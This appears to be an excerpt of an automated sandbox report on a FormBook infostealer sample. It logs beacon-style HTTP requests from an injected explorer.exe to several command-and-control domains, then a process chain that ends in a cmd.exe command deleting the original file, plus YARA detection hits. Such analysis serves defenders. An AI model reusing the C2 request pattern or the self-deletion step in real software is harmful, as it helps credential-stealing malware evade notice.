                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63
                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.44977034.215.126.14780C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:43:48.066593885 CEST7433OUTGET /noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.scgcarriers.com
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        Jun 11, 2021 15:43:48.276607990 CEST7434INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 11 Jun 2021 13:43:48 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 1245
                                                                                                        Connection: close
                                                                                                        Set-Cookie: AWSALB=2QK7EJBKXtmcKfoi1kKMz4Kz6DDYPNTUfh2HsJ/1PMnzdLXVtOElrt2UPMDYvcvaiu4SM3PdXXTr3hc58fBispGB/GR3zfHfXWx3Vl1HzOrPhTDGRSoMNG8fuVIO; Expires=Fri, 18 Jun 2021 13:43:48 GMT; Path=/
                                                                                                        Set-Cookie: AWSALBCORS=2QK7EJBKXtmcKfoi1kKMz4Kz6DDYPNTUfh2HsJ/1PMnzdLXVtOElrt2UPMDYvcvaiu4SM3PdXXTr3hc58fBispGB/GR3zfHfXWx3Vl1HzOrPhTDGRSoMNG8fuVIO; Expires=Fri, 18 Jun 2021 13:43:48 GMT; Path=/; SameSite=None
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.449773154.201.212.11380C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:43:53.842042923 CEST7454OUTGET /noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.customtiletables.com
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.449774104.16.13.19480C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:43:59.411068916 CEST7455OUTGET /noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.marryobaidanjum.com
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        Jun 11, 2021 15:43:59.492834091 CEST7457INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                        Date: Fri, 11 Jun 2021 13:43:59 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                        Set-Cookie: __cfduid=da507f1f5bd87ac88450977c3571d365f1623419039; expires=Sun, 11-Jul-21 13:43:59 GMT; path=/; domain=.www.marryobaidanjum.com; HttpOnly; SameSite=Lax
                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        cf-request-id: 0a9ce9c6d500004e8bb69cc000000001
                                                                                                        Set-Cookie: __cf_bm=ca42e26d5ad347e92d464f49922687ab6e108dcc-1623419039-1800-Afy8CsG58VNK7t93lSl3BXV/nrpqZ7IE4pkIReJMFx6a0BQmv4H931TJk9Pdc5FFG8ebsf+GfAw4gVy2AOeNJoQWznVFadFEoCosQYfrNrKA; path=/; expires=Fri, 11-Jun-21 14:13:59 GMT; domain=.www.marryobaidanjum.com; HttpOnly
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 65db45848bda4e8b-FRA
                                                                                                        Data Raw: 32 30 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41
                                                                                                        Data Ascii: 207d<!DOCTYPE HTML><html lang="en-US"><head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.449775142.250.180.24380C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:44:04.701019049 CEST7467OUTGET /noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.astromaritravel.com
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        Jun 11, 2021 15:44:04.809139967 CEST7467INHTTP/1.1 301 Moved Permanently
                                                                                                        Location: https://travel.astromari.com
                                                                                                        Date: Fri, 11 Jun 2021 13:44:04 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Server: ghs
                                                                                                        Content-Length: 225
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 76 65 6c 2e 61 73 74 72 6f 6d 61 72 69 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://travel.astromari.com">here</A>.</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.44977645.87.1.15980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:44:09.959887981 CEST7468OUTGET /noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.plafon.one
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        Jun 11, 2021 15:44:10.011770010 CEST7469INHTTP/1.1 301 Moved Permanently
                                                                                                        Server: nginx/1.14.2
                                                                                                        Date: Fri, 11 Jun 2021 13:44:10 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 185
                                                                                                        Connection: close
                                                                                                        Location: https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        Analysis Process: OrderKLB210568.exe PID: 6920 Parent PID: 5932

                                                                                                        General

                                                                                                        Start time:15:42:08
                                                                                                        Start date:11/06/2021
                                                                                                        Path:C:\Users\user\Desktop\OrderKLB210568.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Users\user\Desktop\OrderKLB210568.exe'
                                                                                                        Imagebase:0x400000
                                                                                                        File size:221568 bytes
                                                                                                        MD5 hash:759B0D51F128F54E516AD1941A896D77
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        Reputation:low

                                                                                                        Analysis Process: OrderKLB210568.exe PID: 6968 Parent PID: 6920

                                                                                                        General

                                                                                                        Start time:15:42:09
                                                                                                        Start date:11/06/2021
                                                                                                        Path:C:\Users\user\Desktop\OrderKLB210568.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Users\user\Desktop\OrderKLB210568.exe'
                                                                                                        Imagebase:0x400000
                                                                                                        File size:221568 bytes
                                                                                                        MD5 hash:759B0D51F128F54E516AD1941A896D77
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        Reputation:low

                                                                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 6968

                                                                                                        General

                                                                                                        Start time:15:42:14
                                                                                                        Start date:11/06/2021
                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:
                                                                                                        Imagebase:0x7ff6fee60000
                                                                                                        File size:3933184 bytes
                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: raserver.exe PID: 6784 Parent PID: 3424

                                                                                                        General

                                                                                                        Start time:15:42:35
                                                                                                        Start date:11/06/2021
                                                                                                        Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                        Imagebase:0x12b0000
                                                                                                        File size:108544 bytes
                                                                                                        MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        Reputation:moderate

                                                                                                        Analysis Process: cmd.exe PID: 6364 Parent PID: 6784

                                                                                                        General

                                                                                                        Start time:15:42:39
                                                                                                        Start date:11/06/2021
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:/c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
                                                                                                        Imagebase:0x11d0000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: conhost.exe PID: 6632 Parent PID: 6364

                                                                                                        General

                                                                                                        Start time:15:42:40
                                                                                                        Start date:11/06/2021
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff724c50000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >